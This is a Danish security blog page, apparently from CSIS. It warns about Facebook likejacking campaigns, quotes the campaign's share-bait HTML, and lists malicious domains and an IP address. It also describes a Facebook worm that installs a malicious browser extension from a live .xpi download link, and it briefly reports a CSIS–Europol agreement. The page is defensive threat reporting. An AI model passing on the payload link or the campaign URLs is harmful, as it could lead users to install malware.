<span class='st_fblike_hcount' displayText='Facebook Like'></span>
<span class='st_fbsend_hcount' displayText='Facebook Send'></span>
<span class='st_twitter_hcount' displayText='Tweet'></span>
<span class='st_sharethis_hcount' displayText='ShareThis'></span>

Vi har blokeret websiden i CSIS Secure DNS, ligesom vi derved også beskytter Heimdal PRO og corporate kunder mod denne og tilsvarende kampagner.

En ny såkaldt "likejacking" kampagne er i omløb på Facebook og spreder sig viralt blandt danske Facebook brugere.

Denne nye kampagne lokker på "dansk" med overskriften:
"[Sikke en skam] Du won't tro, hvad denne mor tvang sin søn at gøre, efter at få så beruset ...". Se skærmdump herunder:


Med et klik flyttes man således videre til websiden:
hxxp://topnewsonline.pw/dk-top/?dksiys

Denne side indeholder følgende kode snippet, som ved et uforsigtigt klik på indholdet, vil dele kampagnen på din Facebook side således at det uønskede indhold eksponeres for venner og bekendte:

"<div id="video-container">
<div id="video-thumb">
<div id="widget" style="margin-top:-150px;">
<div id="widget-header"><span id="instruction">
Klik på knappen nedenfor og dele video at fortsætte...
</span><div id="share-button">Del Video</div></div>
</div>
<div id="play-button"></div>
</div>
</div>
<div id="traffic">
<script id="_waui3y">var _wau = _wau || []; _wau.push(["classic", "dc44bdam5ij5", "i3y"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="hxxp://widgets.amung.us/classic.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>
</div>
</body>
</html>"

Indholdet er geoIP baseret og afgøres på baggrund af hvor du geografisk befinder dig. På den måde bliver indholdet oversat til dansk hvis du besøger websiden fra en IP adresse i Danmark.

Samtidig trækkes der også indhold og funktioner til brugf i kampagnen, fra følgende URLs:

hxxp://bday-colors.pw/treding/mpeg-player1/
hxxp://fedistreams.pw/haut-fr/?liys

Vi har blokeret domænerne i CSIS Secure DNS og yder derved også beskyttelse i Heimdal PRO og corporate.

Kan du lokkes til at klikke på den slags spændende overskrifter og mindst ligeså spændende links til videoer, hvis du ser dem på Facebook? Det korte svar burde være: "for pokker da nej".

Vi advarer her mod dagens mere trivielle, men stadig unødigt støjende Likejacking kampagne. I dag lokkes der med en kvinde som "spises af en Anaconda". Ja, tak for kaffe! Naturligvis fake så det driver, men det virker åbenlyst...


Som det fremgår af ovenstående billede trækkes trafikken via domænet: insanelist.net (kan man roligt blokere), men derfra sendes brugeren videre til en server på IP adressen: 192.186.247.174. Denne server er særligt spændende, idet den huser flere andre Likejacking kampagner. Et kig ned i mappe strukturen (da den er komplet åben for enhver) giver os en god ide om hvad vi har i vente fra disse amatører:

anaconda/
anaconda2/
dare/
dareyou/
iphone/
nice/
nutella/
pencil/
pimple/
roller/
shark/
spider/
worm/

Hvis man vil vide mere om Likejacking, så læs venligst vores artikel: "Anatomien bag Likejacking" eller endnu bedre. Send den til de venner som konstant "synes godt om den slags og støjer": https://www.csis.dk/da/csis/blog/4118/

Måske artiklen kan hjælpe folk til at lade være med at "Like" / "Synes godt om" alle de tåbelige videoer som er i omløb?

Det danske IT-sikkerhedsfirma CSIS har indgået en aftale med Europol EC3. Målet er, i fællesskab, at bekæmpe den voksende it-kriminalitet.

I et målrettet og europæisk samarbejde har Europol og CSIS underskrevet en strategisk samarbejdsaftale som i fremtiden skal øge indsatsen mod organiseret online kriminalitet.

Det styrkede og formaliserede samarbejde har bl.a. til formål at udveksle tekniske data som konkret skal føre til efterforskning og anholdelse af it-kriminelle.

Aftalen, som netop er indgået mellem Europol og CSIS, er et resultat af en øget opmærksomhed mod den voksende it-kriminalitet.

Med vores viden, som CSIS i den daglige efterforskning af bl.a. BOTnets, målrettede angreb og netbank tyve, kommer i besiddelse af, kan vores data nu deles med EC3 med henblik på international efterforskning.

"Det er vores mål løbende at fodre vores samarbejdspartner", EC3 med oplysninger som kan være relevante for en politi efterforskning, forklarer Peter Kruse som er stifter og daglig leder af CSIS’ særlige eCrime Unit. Han fortsætter: ”vi må erkende at efterforskning af it-kriminalitet er højt på agendaen i mange lande, men at det samtidig også er en tung og teknisk besværlig opgave at løfte. Løsningen er imidlertid at styrke informationsdelingen og samarbejdet mellem private og specialiserede sikkerhedsfirmaer som vores og internationalt politi. Den nye samarbejdsaftale er afgjort et skridt i den rigtige retning”.

EC3 blev etableret sidste år som en indsats mod cyber-kriminalitet, bekæmpelse af pædofilt materiale samt til beskyttelse af kritisk infrastruktur i EU.

En samlet og styrket indsats mod it-kriminalitet
"Det er vores opfattelse at EC3’s berettigelse, som omdrejningspunkt i efterforskning af it-kriminalitet, allerede har båret frugt med flere vellykkede operationer og anholdelser. Den tendens ser vi gerne fortsætter", forklarer Peter Kruse og uddyber ”når virksomheder og brugere i Danmark udsættes for it-kriminalitet, så peger sporene typisk ud af landet, hvorfor netop et formaliseret samarbejde med Europol giver god mening”.

Yderligere oplysninger om Europol/EC3:
https://www.europol.europa.eu/ec3

Yderligere oplysninger om CSIS:
https://www.csis.dk/da/csis/about/

Vi ser i disse timer mange rapporter omkring en ny "orm" som replikerer sig over Facebook.

Ormen, som inficerer via et link der peger på "Dropbox", sender sig selv videre som en besked til venner og bekendte og poster sig endvidere på ofrets væg med følgende indhold:

"%Navnet på offer%" Private Video [link til dropbox].
"%Navnet på offer%" OMG! [link]

Den tagger samtidig venner og bekendte, hvorved den opnår hurtig spredning.

Brugeren skal åbne og aktivere linket til dropbox for at blive inficeret. Ved infektion vil koden installere sig som en browser udvidelse.

Vi har endvidere set en tilsvarende kampagne som peger på skyen hos Amazon og som tilbyder et "New Emoticons!" udvidelse via:
hxxp://video5826.s3-website.eu-central-1.amazonaws.com/


Denne flytter trafikken videre til:
hxxp://free.motitags.com som tilbyder "Motitags toolbar".




Som det kan ses af ovenstående hentes pluginet fra:

Premium Codec
http://ajetem68.mzzhost.com/premiumD.xpi

Den pågældende udvidelse installeres som "Premium Code" og kan fjernes under udvidelser. Den understøtter Internet Explorer, Firefox og Chrome.

Facebook brugere som er inficeret kan genkendes ved at de poster beskeder med tags som eksempelt tidligere. Koden muterer løbende. Den seneste variant gør brug af URL-forkorter tjenesten goo.gl. Der genereres også løbende nye links og billede indhold.

Indholdet trækkes via en IRC server, som den inficerede maskine hiver nye instruktioner fra. Denne er blokeret i Heimdal PRO og CSIS Secure DNS ligesom vi har blokeret de websider som det skadelige indhold leveres igennem. Vi detekterer trafikken som "FBMotitags". Antivirus detektion er lav.